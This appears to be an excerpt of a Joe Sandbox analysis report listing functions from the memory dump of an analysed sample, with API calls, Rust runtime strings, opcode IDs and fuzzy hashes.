                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeapmemcpy$CloseHandle
                                                                                          • String ID: Large file option has not been setShould have switched to stored beforehand$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
                                                                                          • API String ID: 1935092867-1117091765
                                                                                          • Opcode ID: 34cbc9145a1690a0868c0c1fbc9ba0ea4c91632badf514ffac50ad5916ca4327
                                                                                          • Instruction ID: 00c7d5dd230c4fffa3dd8b553992d350f12dafca9e1fd29b65951cff22fdaa31
                                                                                          • Opcode Fuzzy Hash: 34cbc9145a1690a0868c0c1fbc9ba0ea4c91632badf514ffac50ad5916ca4327
                                                                                          • Instruction Fuzzy Hash: 8EE15161A08AC2D9EB31AF25DC593E9A360FF48788F844136DA4D4BF99DF38D245C354
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BACDDF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ContinueErrorFreeGuaranteeHandlerHeapLastStackThreadVectored
                                                                                          • String ID: failed to write whole buffer$main$mainfatal runtime error:
                                                                                          • API String ID: 3409190282-2718436711
                                                                                          • Opcode ID: aeb54d3a99fa284d5adb5956aa0d5e79f2c27acdf439847f30f727040742ccb1
                                                                                          • Instruction ID: 1b2686548fba02eddd8228d7b0094119a9a90c55b51f65491dcc62d1e631c631
                                                                                          • Opcode Fuzzy Hash: aeb54d3a99fa284d5adb5956aa0d5e79f2c27acdf439847f30f727040742ccb1
                                                                                          • Instruction Fuzzy Hash: D9611C36A14B52D9EB11EF60E8543E8B3A4FF48358F800235EA4D46B99DF7CD199C368
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B75A3C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 201COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • WQLC:\Users\user\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.6.4\src\write.rs, xrefs: 00007FF768B75A5B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: String$Free$Alloc
                                                                                          • String ID: WQLC:\Users\user\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.6.4\src\write.rs
                                                                                          • API String ID: 986138563-2131960552
                                                                                          • Opcode ID: ba2be0d499ab004eed7cc565eaefb804ac2a81f68aabd20547b84c199778f52a
                                                                                          • Instruction ID: 2893ec53e992d7c0c47ad7858d6ea05ae9235dc9c08a7217c29fb44f8ea6b2d7
                                                                                          • Opcode Fuzzy Hash: ba2be0d499ab004eed7cc565eaefb804ac2a81f68aabd20547b84c199778f52a
                                                                                          • Instruction Fuzzy Hash: BBA14922A0DBC4C5E7619B29E4007AAE760FB99784F449221EFCD07B5ADF3CE589C714
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C38AC9 Relevance: 8.0, APIs: 5, Instructions: 548encryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy$CertDuplicate$CertificateContextStore
                                                                                          • String ID:
                                                                                          • API String ID: 2867652078-0
                                                                                          • Opcode ID: 93d0e8699e5b21879e7a518cf57e7fc9bc55635700d547c4f563102a90e10dfd
                                                                                          • Instruction ID: ffe7ee3e8c71bcd63c02b5484bce11346e4f941808d9c548efc65ab5e6269f72
                                                                                          • Opcode Fuzzy Hash: 93d0e8699e5b21879e7a518cf57e7fc9bc55635700d547c4f563102a90e10dfd
                                                                                          • Instruction Fuzzy Hash: 0F528A36609BC59AE3698B28E1407EEFBA0FB99784F444125DBDC43B15DF38E1A5CB10
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BA8E46 Relevance: 7.7, APIs: 6, Instructions: 198memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeapmemcpy$CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 1935092867-0
                                                                                          • Opcode ID: bb7e61bf7d08391a4009144b17d6cb0f27e9f5c01a94df544f07587718be0ded
                                                                                          • Instruction ID: b74e899b2a554a60bbffcea81504a7fc9144008db13f39fd72eabf1ce9697770
                                                                                          • Opcode Fuzzy Hash: bb7e61bf7d08391a4009144b17d6cb0f27e9f5c01a94df544f07587718be0ded
                                                                                          • Instruction Fuzzy Hash: 48A14D62A04AC1D9EB31AF25D8583E9A761FF48788F844136DA0D4FF99DF38D645C318
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BF4533 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 229COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF768BF48BE: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF768BF48D4
                                                                                            • Part of subcall function 00007FF768BF48BE: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF768BF497F
                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00000000,?,?,?,00007FF768C80CB8), ref: 00007FF768BF45D1
                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00000000,?,?,?,00007FF768C80CB8), ref: 00007FF768BF4647
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AcquireExclusiveLock
                                                                                          • String ID: assertion failed: !self.is_polling.swap(true, Ordering::AcqRel)$called `Result::unwrap()` on an `Err` value
                                                                                          • API String ID: 4021432409-1708566100
                                                                                          • Opcode ID: 8b5573b0157ebc41339444c956e642e7ee0d31376748335adf841d791e48bf27
                                                                                          • Instruction ID: b6d3b6b079904834464fa0d11d4fe597318e74cb82b898b6f3b34e176b15ad7f
                                                                                          • Opcode Fuzzy Hash: 8b5573b0157ebc41339444c956e642e7ee0d31376748335adf841d791e48bf27
                                                                                          • Instruction Fuzzy Hash: B2A1A272A08781C6EB61AF11E55036AF760FF49B94F884136EA9E07B95CF3CE445C324
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B82A67 Relevance: 6.3, APIs: 5, Instructions: 61memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: da77c14e3c7e2128b8d0bceed3bf94ef10d8a7de4a1bef5f494ae5cf60d1e457
                                                                                          • Instruction ID: f9b8c3e95820a8e85457a6ee4ed54a0c95854bce16a023ac25eb2c8ec49014dd
                                                                                          • Opcode Fuzzy Hash: da77c14e3c7e2128b8d0bceed3bf94ef10d8a7de4a1bef5f494ae5cf60d1e457
                                                                                          • Instruction Fuzzy Hash: 143136A6A09BC2C1E662EB15F4443A9E365FF8CB94F848032DA8D03694DF3CD489C724
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B9994E Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 157memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$memcmpmemcpy
                                                                                          • String ID: Large file option has not been setShould have switched to stored beforehand$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
                                                                                          • API String ID: 2605475555-1117091765
                                                                                          • Opcode ID: f236189193b25e8e6d3c5d93d6b6d6bad8036f742a62df5c6ee451ab1745fdd5
                                                                                          • Instruction ID: b0bfcd4df9d48a71e00b576a5b08104f4e566686b378337297d6618415d0febf
                                                                                          • Opcode Fuzzy Hash: f236189193b25e8e6d3c5d93d6b6d6bad8036f742a62df5c6ee451ab1745fdd5
                                                                                          • Instruction Fuzzy Hash: 1B718E21A0DAC2C4EE61AB05E4453F9E360EF99784FC44131DA8D12BA6EF3CE945C718
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C74F50 Relevance: 6.1, APIs: 4, Instructions: 90memorythreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$CreateErrorLastThread
                                                                                          • String ID:
                                                                                          • API String ID: 1443094557-0
                                                                                          • Opcode ID: 7aaee243a740567ac4ce6b3acae354bf742a32ab18df627e412bed6e5ca2030a
                                                                                          • Instruction ID: 27d8b5e673810c4f288b07d02cc6321a7a2bad7ca51b1cda9987215758c9c68c
                                                                                          • Opcode Fuzzy Hash: 7aaee243a740567ac4ce6b3acae354bf742a32ab18df627e412bed6e5ca2030a
                                                                                          • Instruction Fuzzy Hash: 8731A272A04A41C6F710AB22E8043ADE765FF88BA4F848535DE9C07794DF3CD486C364
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768D87928 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 215COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _cwprintf_s_l
                                                                                          • String ID: %s in "%s"$unrecognized token: "%T"
                                                                                          • API String ID: 2941638530-735598712
                                                                                          • Opcode ID: c14810d6ad67b666fa321cc9a658d92df14901f861a793dbe2f53be44da342b6
                                                                                          • Instruction ID: cba9e03ad74c10d30f590adbad4f1d51116da7f20c2a6590ba939e595f0a7429
                                                                                          • Opcode Fuzzy Hash: c14810d6ad67b666fa321cc9a658d92df14901f861a793dbe2f53be44da342b6
                                                                                          • Instruction Fuzzy Hash: 98A1A0B2A08682D6EA20EB25D4402BDF3A1FF88754F944132DA8D47695DF3CE689C774
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C95BA2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeString
                                                                                          • String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
                                                                                          • API String ID: 3341692771-1586615424
                                                                                          • Opcode ID: 4974adea78dceca98d4988773f64fd0ef3bc463a35b46f8762b2d9715933d5f8
                                                                                          • Instruction ID: af05cd0b0302e341d88275cb671787869c85a0bb4b16aba713ba816c0ab82b23
                                                                                          • Opcode Fuzzy Hash: 4974adea78dceca98d4988773f64fd0ef3bc463a35b46f8762b2d9715933d5f8
                                                                                          • Instruction Fuzzy Hash: 01518022A08782C2E7219F25E4503AAF7A0FF99784F848171EBCD43B55EF7DE5858B14
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B75164 Relevance: 5.2, APIs: 4, Instructions: 212COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy$memcmpmemset
                                                                                          • String ID:
                                                                                          • API String ID: 2168465325-0
                                                                                          • Opcode ID: 32211b9766c9473184db05993878ee459431b8129ed1ff205b537697de184384
                                                                                          • Instruction ID: 4a00e3ede6fb18ee4747da84bf58940319a8dbe5291e54e062be3167bfe47e5a
                                                                                          • Opcode Fuzzy Hash: 32211b9766c9473184db05993878ee459431b8129ed1ff205b537697de184384
                                                                                          • Instruction Fuzzy Hash: B581C163A18B8281EA119B2DA44137AF7A0FF99B94F444326EFCE53794EF3CD1818714
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768DA2D5C Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 239COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID: gfff
                                                                                          • API String ID: 2221118986-1553575800
                                                                                          • Opcode ID: c2d6b67456a80309d6f34d1604c200ec815df878954eaf80c06d13abfe4e0150
                                                                                          • Instruction ID: 7bf1ccf35e409a129b160718e0070b65a56c4efc293eeda74d50085675a7c79f
                                                                                          • Opcode Fuzzy Hash: c2d6b67456a80309d6f34d1604c200ec815df878954eaf80c06d13abfe4e0150
                                                                                          • Instruction Fuzzy Hash: DAB12D70E0DA43C5FA68BB52E840278E6A1BF49B84FD00439E40D4ABA5DF7CA549C37D
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C7D41A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 85memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • HeapFree.KERNEL32(?,?,000000A8,?,?,00007FF768C7E6F7,?,?,000000B0,00007FF768C7E537), ref: 00007FF768C7D483
                                                                                            • Part of subcall function 00007FF768C7DE83: HeapFree.KERNEL32 ref: 00007FF768C7DE98
                                                                                          • HeapFree.KERNEL32(?,?,000000A8,?,?,00007FF768C7E6F7,?,?,000000B0,00007FF768C7E537), ref: 00007FF768C7D4D5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID: queue not empty
                                                                                          • API String ID: 3298025750-3948391038
                                                                                          • Opcode ID: bd86143b93249d4c55127554c9e48f70f611e66465373d5215f0d787d24fc613
                                                                                          • Instruction ID: ca558d297ca0aee4fb869bccc3fbca85603b341ec6d4558785d21c805061d2b8
                                                                                          • Opcode Fuzzy Hash: bd86143b93249d4c55127554c9e48f70f611e66465373d5215f0d787d24fc613
                                                                                          • Instruction Fuzzy Hash: 6E313362909982C2FAA5FB15E4403F9E360EF947A4FC44572DB6D062E5DF3CF4468328
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C72B30 Relevance: 4.6, APIs: 3, Instructions: 72memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00007FF768C6D3AE), ref: 00007FF768C72B67
                                                                                          • HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,00007FF768C6D3AE), ref: 00007FF768C72BD1
                                                                                          • HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,00007FF768C6D3AE), ref: 00007FF768C72BE3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3036504266-0
                                                                                          • Opcode ID: fdae390428552abae959623d0d3831170bbdfdb4a59ae1184932c5cd168ac09c
                                                                                          • Instruction ID: 4308a415d20d131aa44d5f6f6da19a2c977f10ccdf94f3300fcd01251f982d88
                                                                                          • Opcode Fuzzy Hash: fdae390428552abae959623d0d3831170bbdfdb4a59ae1184932c5cd168ac09c
                                                                                          • Instruction Fuzzy Hash: 2C314772A04A51C4E711DF16E8443ACE765FF88BA8F898672DF2E13794DF38D4868364
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C5AD00 Relevance: 4.6, APIs: 3, Instructions: 66memorythreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF768C5DB10: HeapFree.KERNEL32(?,?,?,?,?,00000008,?,?,?,?,?,00007FF768C60892), ref: 00007FF768C5DC42
                                                                                          • SetThreadDescription.KERNELBASE ref: 00007FF768C5AD63
                                                                                          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00005000,?,00007FF768BACE49), ref: 00007FF768C5ADBA
                                                                                          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00005000,?,00007FF768BACE49), ref: 00007FF768C5ADD2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$DescriptionThread
                                                                                          • String ID:
                                                                                          • API String ID: 2200118514-0
                                                                                          • Opcode ID: f9b7f8e191d230bc1a1cd1b1d9e4cc7515ab4ceb57a3d08b63bdd3bba8ad6695
                                                                                          • Instruction ID: a0c7cd7cd23294869937a223d02cf88aa672028826d2e0bb05b6792b2f1055d2
                                                                                          • Opcode Fuzzy Hash: f9b7f8e191d230bc1a1cd1b1d9e4cc7515ab4ceb57a3d08b63bdd3bba8ad6695
                                                                                          • Instruction Fuzzy Hash: AC214B62B04A45C4EF10EB62D8442ACE770FF89B94F888636DE1D23798DF38D495C324
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B7921D Relevance: 4.5, APIs: 3, Instructions: 30memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
